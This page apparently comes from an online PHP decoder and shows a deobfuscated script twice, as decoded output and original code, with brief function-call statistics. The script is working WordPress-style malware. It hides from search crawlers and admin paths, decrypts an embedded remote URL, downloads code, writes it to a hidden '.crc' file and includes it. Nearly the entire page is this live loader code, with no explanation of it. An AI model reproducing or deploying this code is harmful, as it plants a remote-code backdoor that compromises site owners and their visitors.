Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @ini_set('display_errors', '0'); error_reporting(0); $bad_agents = '~google|360Spid..
Decoded Output download
<?php @ini_set('display_errors', '0'); error_reporting(0); $bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i'; $bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|administrator#'; if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) { $ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'crc'; $pass = "Zgc5c4MXrKogeQgN5ppcK/+GOVfVKqVbnjvME6jH/h0ZYgYYWhtm4d07"; function httpget($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); return $data; } elseif (@ini_get('allow_url_fopen')) { return @file_get_contents($url); } else { $parts = parse_url($url); $target = $parts['host']; $port = isset($parts['port']) ? $parts['port'] : 80; $page = isset($parts['path']) ? $parts['path'] : ''; $page .= isset($parts['query']) ? '?' . $parts['query'] : ''; $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : ''; $page = ($page == '') ? '/' : $page; if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) { @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1)); $headers = "GET $page HTTP/1.1
"; $headers .= "Host: {$parts['host']}
"; $headers .= "Connection: Close
"; if (fwrite($fp, $headers)) { $resp = ''; while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) { $resp .= $curr; } if (isset($curr) && $curr !== false) { fclose($fp); return substr(strstr($resp, "
"), 3); } } fclose($fp); } } return false; } function wp_cd($fd, $fa="") { $fe = "wp_frmfunct"; $len = strlen($fd); $ff = ''; $n = $len>100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); $ura = 0; foreach ($dirs as $dira) { if (file_exists("$dira/.$algo")) { $ura = 1; $eb = "$dira/"; @include_once "$dira/.$algo"; break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (file_exists("$subdira/.$algo")) { $ura = 1; $eb = "$subdira/"; @include_once("$dira/.$algo"); break; } } } if (!$ura) { foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, rawurldecode($mtchs[1])); fclose($hdl); @include("{$eb}.$algo"); } } ?>Did this file decode correctly?
Original Code
<?php @ini_set('display_errors', '0'); error_reporting(0); $bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i'; $bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|administrator#'; if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) { $ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'crc'; $pass = "Zgc5c4MXrKogeQgN5ppcK/+GOVfVKqVbnjvME6jH/h0ZYgYYWhtm4d07"; function httpget($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); return $data; } elseif (@ini_get('allow_url_fopen')) { return @file_get_contents($url); } else { $parts = parse_url($url); $target = $parts['host']; $port = isset($parts['port']) ? $parts['port'] : 80; $page = isset($parts['path']) ? $parts['path'] : ''; $page .= isset($parts['query']) ? '?' . $parts['query'] : ''; $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : ''; $page = ($page == '') ? '/' : $page; if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) { @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1)); $headers = "GET $page HTTP/1.1\r\n"; $headers .= "Host: {$parts['host']}\r\n"; $headers .= "Connection: Close\r\n\r\n"; if (fwrite($fp, $headers)) { $resp = ''; while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) { $resp .= $curr; } if (isset($curr) && $curr !== false) { fclose($fp); return substr(strstr($resp, "\r\n\r\n"), 3); } } fclose($fp); } } return false; } function wp_cd($fd, $fa="") { $fe = "wp_frmfunct"; $len = strlen($fd); $ff = ''; $n = $len>100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); $ura = 0; foreach ($dirs as $dira) { if (file_exists("$dira/.$algo")) { $ura = 1; $eb = "$dira/"; @include_once "$dira/.$algo"; break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (file_exists("$subdira/.$algo")) { $ura = 1; $eb = "$subdira/"; @include_once("$dira/.$algo"); break; } } } if (!$ura) { foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, rawurldecode($mtchs[1])); fclose($hdl); @include("{$eb}.$algo"); } } ?>Function Calls
| ini_set | 1 |
| preg_match | 1 |
| error_reporting | 1 |
Stats
| MD5 | d31cdbf75fe31980c134ccb1ee667d00 |
| Eval Count | 0 |
| Decode Time | 142 ms |